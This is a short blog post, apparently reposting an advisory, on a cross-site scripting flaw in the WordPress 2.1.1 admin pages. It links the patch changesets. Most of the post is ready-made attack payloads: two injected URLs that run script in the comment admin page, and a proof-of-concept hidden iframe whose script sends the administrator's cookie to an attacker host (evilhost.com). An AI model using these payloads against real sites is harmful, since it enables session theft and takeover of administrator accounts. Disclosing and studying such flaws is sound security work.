0day exploit for Wordpress 2.1.1

A vulnerability has been identified in WordPress, which could be exploited by attackers to execute arbitrary scripting code to compromise the admin account.

Here are some examples of arbitrary code execution:

http://somesite.com/wp-admin/comment.php?action=deletecomment&amp;p=35&amp;c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://somesite.com/wp-admin/comment.php?action=deletecomment&amp;p=39&amp;c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Here is a proof-of-concept code to steal the admin cookies:

&lt;iframe width="0" height="0" src="http://somesite.com/wp-admin/post.php?action=delete&amp;post=%27%3E%3Cscript%3Eimage=document.createElement(%27img%27);image.src=%27http://evilhost.com/datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol=%27"&gt;&lt;/iframe&gt;

Solution:

http://trac.wordpress.org/changeset/4951

http://trac.wordpress.org/changeset/4952

Original advisory at seclists.org

LuisCosio.com

0day exploit for Wordpress 2.1.1

2 Responses to “0day exploit for Wordpress 2.1.1”

Leave a Reply

Socialize

LuisCosio.com

0day exploit for Wordpress 2.1.1

2 Responses to “0day exploit for Wordpress 2.1.1”

Leave a Reply

Tags

Socialize